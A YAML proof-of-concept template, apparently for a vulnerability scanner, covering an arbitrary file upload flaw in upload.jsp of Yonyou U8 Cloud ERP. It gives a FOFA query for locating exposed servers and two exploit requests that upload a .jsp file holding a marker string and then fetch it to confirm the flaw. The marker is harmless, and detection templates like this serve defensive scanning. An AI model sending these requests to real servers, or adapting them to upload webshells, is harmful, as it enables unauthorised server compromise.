product: 用友U8-Cloud
vName: 用友U8 Cloud upload.jsp任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。该系统upload.jsp存在任意文件上传漏洞，攻击者可通过该漏洞上传木马，远程控制服务器
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
protocol: http
link: https://blog.csdn.net/CommputerMac/article/details/134019933
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /linux/pages/upload.jsp
      header:
        filename: 52e039302a62d077.jsp
      data: 95cc64dd2825f9df13ec4ad683ecf339
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - File upload success
            logic: and
  - exp:
      method: get
      follow: false
      path: /linux/52e039302a62d077.jsp
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and